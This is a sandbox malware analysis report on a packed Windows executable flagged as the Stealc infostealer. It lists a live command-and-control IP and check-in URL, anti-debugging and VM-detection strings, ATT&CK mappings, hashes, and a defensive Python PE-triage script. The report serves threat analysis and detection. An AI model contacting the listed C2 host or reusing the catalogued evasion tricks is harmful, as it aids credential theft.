                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A64570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A63EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A5F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A5DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A5BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A51160 GetSystemInfo,ExitProcess
                Source: file.exe, file.exe, 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWm0>
                Source: file.exe, 00000001.00000002.1365721662.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1322360305.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1365721662.0000000001473000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware7
                Source: file.exe, 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_1-13639
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_1-13636
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_1-13658
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_1-13649
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_1-13690
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A545C0 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A69860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A69750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A678E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A69600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: file.exe, file.exe, 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: )Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A67B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A67980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A67850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A67A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 1.2.file.exe.a50000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000001.00000003.1295074155.0000000005350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 1.2.file.exe.a50000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000001.00000003.1295074155.0000000005350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix: techniques flagged by the report's signatures, with the number of matching signatures in parentheses (matrix cells without a hit are omitted):
• Execution: Command and Scripting Interpreter (2), Native API (11)
• Persistence: DLL Side-Loading (1)
• Privilege Escalation: Process Injection (11), DLL Side-Loading (1)
• Defense Evasion: Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
• Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
• Collection: Archive Collected Data (1)
• Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12)
• No hits under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact.

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

Initial sample (Source | Detection | Scanner | Label | Link):
file.exe | 39% | ReversingLabs | Win32.Trojan.Generic |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches
URLs (Source | Detection | Scanner | Label | Link):
http://185.215.113.37/ | 100% | URL Reputation | malware |
http://185.215.113.37 | 100% | URL Reputation | malware |
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
Contacted domains: No contacted domains info
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
URLs from memory and binary strings (Name | Source | Malicious | Antivirus Detection | Reputation):
http://185.215.113.37/u8 | file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpE | file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpU | file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php3 | file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37s | file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpG | file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
The trailing characters on the memory-string variants (u8, E, U, 3, s, G) are almost certainly adjacent heap bytes picked up by the string scan rather than part of the URL; the two URLs actually requested on the wire are http://185.215.113.37/ and http://185.215.113.37/e2b1563c6670f193.php.
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1522357
Start date and time: 2024-09-30 00:29:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 82
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• VT rate limit hit for: file.exe
                            No simulations
Joe Sandbox View / Context (Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context):
IPs: 185.215.113.37 appears in 10 earlier submissions named file.exe, all detected as malicious (7 tagged Stealc, 3 tagged Stealc, Vidar), every one of them contacting 185.215.113.37/e2b1563c6670f193.php. SHA-256 values and report links sit behind "Get hash" / "Browse" links that are not included in this export.
Domains: No context
ASNs: WHOLESALECONNECTIONSNL appears in 10 earlier submissions named file.exe (7 Stealc, 3 Stealc, Vidar), all contacting 185.215.113.37.
JA3 fingerprints: No context
Dropped files: No context
                            No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.94652558651442
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'864'704 bytes
MD5: 0079fd2131677b1d9eab7228129b05c6
SHA1: b990a78e97be25d3296df08c7fd3c2c2491804cb
SHA256: e5d54dbfb6aa3a373538a399c8727551d092d8980fe263cccda5b4b910154a04
SHA512: d8d8ebe2e58fdec3ffd61dc00d1495593f7c99d621bc73a3bf016121bc756dc6ce2094b22d242e1f74a7c580907e15f4d38a70ccbea1f611a5a2a0a1e277fa85
SSDEEP: 49152:u/NJGzIPPKFIXSTHseBtAKmGXMO6HfIryi81qMojb3bScdt:zInKFIi8KmhOCfQ981AjL7
TLSH: F585336DAC2EBD36DC8D0DF6DFC34A9F3ABE1993114767B1661576BA0492101FA38C80
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0xaa1000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC] (about four hours before the analysis start time of 2024-09-30 00:29:08 +02:00)
TLS Callbacks: none (the TLS data directory is empty)
CLR (.Net) Version: none (the COM descriptor data directory is empty)
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instructions at the entry point (0xaa1000, inside .taggant). After the two jmp instructions the listing is almost entirely zero bytes, which the disassembler renders as add byte ptr [eax], al; nothing here is meaningful code:
                            jmp 00007F60F0F7170Ah
                            rsqrtps xmm3, dqword ptr [eax+eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            jmp 00007F60F0F73705h
                            add byte ptr [0000000Ah], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], cl
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add eax, 0000000Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], cl
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add eax, 0000000Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], dl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax*4], cl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add eax, 0000000Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], dl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ebx], cl
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
Data directories (Name | Virtual Address | Virtual Size | Is in Section):
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections (Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics):
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 427e8447da43253ef3ede1ed6d77617c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x2a0000 | 0x200 | 7cf1fdc520cc37f99f078bcae65bb2d9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
aabwzlbm | 0x4fe000 | 0x1a2000 | 0x1a1200 | 291da12c71ba6c53bb3cb72aa3eb02bb | False | 0.9949325273449205 | data | 7.952978260214906 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cxkmbtsd | 0x6a0000 | 0x1000 | 0x400 | f24abbc44fbe0a7aa09d38c8710d4360 | False | 0.8076171875 | data | 6.257562000450293 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6a1000 | 0x3000 | 0x2200 | bf7ad851b356722ed8fbec9821ad12e0 | False | 0.07238051470588236 | DOS executable (COM) | 0.9336206550634348 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Imports (DLL | Import):
kernel32.dll | lstrcpy
Five of the seven sections are readable, writable and executable, two carry no name and two carry random eight-letter names, the entry point sits in .taggant rather than in a code section, and the import table names a single function. The raw sizes account for the whole file (0x1000 of headers plus the section raw sizes gives 0x1c7400 = 1'864'704 bytes), so the 1.6 MB aabwzlbm section with entropy 7.95 is the obvious candidate for the packed payload; the LoadLibraryA/GetProcAddress chain in the execution graph below is what resolves the real imports at run time.
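The packer tells listed above (RWX sections, entry point outside a code section, unnamed and random section names, a section that inflates at load time, one high-entropy section, a near-empty import directory) can be checked mechanically. The following is an added example, not code from the Joe Sandbox report or from Joe Security: a stdlib-only PE32 header parser with a triage function, run against an image that is constructed here (not the real file.exe) to mirror the section table, entry point and import directory shown above. The 8:1 virtual-to-raw ratio and the 7.0 entropy threshold are assumptions chosen for this example.

```python
"""Static triage of a PE32 section table, entry point and import directory.
Added example, not part of the Joe Sandbox report. sample_image() is a constructed
image mirroring the section layout in the report; it is not the real file.exe."""
import math
import os
import struct
from collections import Counter

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
CODE_SECTION_NAMES = {".text", "CODE", ".code"}   # where a compiler-linked entry point normally lives
FILE_ALIGN, SECTION_ALIGN = 0x200, 0x1000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def align(value: int, boundary: int) -> int:
    return (value + boundary - 1) // boundary * boundary


def build_pe32(sections, entry_rva, image_base=0x400000, import_dir=(0, 0)):
    """Emit a minimal PE32 image: DOS header, PE signature, COFF header, optional header,
    section table, then each section's raw data at file alignment.
    sections: list of (name, virtual_address, virtual_size, raw_data, characteristics)."""
    headers_size = align(0x40 + 4 + 20 + 224 + 40 * len(sections), FILE_ALIGN)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew: PE header at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    size_of_image = align(max(va + vsize for _, va, vsize, _, _ in sections), SECTION_ALIGN)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 10, 0, 0, 0, 0, entry_rva, 0, 0, image_base, SECTION_ALIGN, FILE_ALIGN,
                      5, 1, 5, 1, 5, 1, 0, size_of_image, headers_size, 0, 2, 0x8140,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[1] = import_dir                                          # IMAGE_DIRECTORY_ENTRY_IMPORT
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    table, body, raw_ptr = b"", b"", headers_size
    for name, va, vsize, raw, chars in sections:
        raw_size = align(len(raw), FILE_ALIGN)
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, va,
                             raw_size, raw_ptr if raw_size else 0, 0, 0, 0, 0, chars)
        body += raw.ljust(raw_size, b"\0")
        raw_ptr += raw_size
    return (dos + b"PE\0\0" + coff + opt + table).ljust(headers_size, b"\0") + body


def parse_pe32(data: bytes) -> dict:
    """Pull entry point, image base, data directories and section table out of a PE32."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsections = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(16)]
    sections = []
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                         "raw_size": raw_size, "raw": data[raw_ptr:raw_ptr + raw_size], "chars": chars})
    return {"entry_rva": entry_rva, "image_base": image_base, "dirs": dirs, "sections": sections}


def triage(data: bytes) -> dict:
    """Flag the packer tells: RWX sections, entry point outside a code section, unnamed or
    random section names, sections far larger in memory than on disk, high-entropy data."""
    pe = parse_pe32(data)
    ep, secs = pe["entry_rva"], pe["sections"]
    entry = next((s["name"] for s in secs if s["va"] <= ep < s["va"] + max(s["vsize"], s["raw_size"])), None)
    f = {
        "entry_point": pe["image_base"] + ep,
        "entry_section": entry,
        "entry_outside_code_section": entry not in CODE_SECTION_NAMES,
        "rwx_sections": [s["name"] for s in secs if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE],
        "odd_section_names": [s["name"] for s in secs if not s["name"].startswith(".")],
        "inflating_sections": [s["name"] for s in secs if s["raw_size"] and s["vsize"] > 8 * s["raw_size"]],
        "high_entropy_sections": [s["name"] for s in secs if s["raw_size"] and shannon_entropy(s["raw"]) > 7.0],
        "import_dir": pe["dirs"][1],
    }
    f["suspicious"] = bool(f["rwx_sections"] or f["entry_outside_code_section"] or f["high_entropy_sections"])
    return f


def sample_image() -> bytes:
    """Constructed PE mirroring the report's section table (names, addresses, sizes,
    characteristics), entry point 0x6a1000 in .taggant and import directory at 0x25d050."""
    sections = [
        ("",         0x001000, 0x25b000, b"\0" * 0x22800, RWX),
        (".rsrc",    0x25c000, 0x001000, b"", RW),
        (".idata",   0x25d000, 0x001000, b"\0" * 0x200, RW),
        ("",         0x25e000, 0x2a0000, b"\0" * 0x200, RWX),
        ("aabwzlbm", 0x4fe000, 0x1a2000, os.urandom(0x1a1200), RWX),   # stands in for the packed payload
        ("cxkmbtsd", 0x6a0000, 0x001000, bytes(range(64)) * 16, RWX),  # entropy 6.0, below threshold
        (".taggant", 0x6a1000, 0x003000, b"\0" * 0x2200, RWX),
    ]
    return build_pe32(sections, entry_rva=0x6a1000, import_dir=(0x25d050, 0x64))


if __name__ == "__main__":
    for key, value in triage(sample_image()).items():
        print(f"{key}: {value}")
```

Run against a real file, `triage(open(path, "rb").read())` gives the same dictionary; the constructed image only exists so the example runs offline. Note that the import directory size (0x64 here) is reported rather than the import count, because counting imports means reading the import descriptors from section data, which this header-level pass deliberately avoids.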
Suricata IDS alerts (Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol):
2024-09-30T00:30:12.065256+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49700 | 185.215.113.37 | 80 | TCP
TCP packets (Timestamp | Source Port | Dest Port | Source IP | Dest IP):
Sep 30, 2024 00:30:10.017556906 CEST | 49700 | 80 | 192.168.2.7 | 185.215.113.37
Sep 30, 2024 00:30:10.022598982 CEST | 80 | 49700 | 185.215.113.37 | 192.168.2.7
Sep 30, 2024 00:30:10.023593903 CEST | 49700 | 80 | 192.168.2.7 | 185.215.113.37
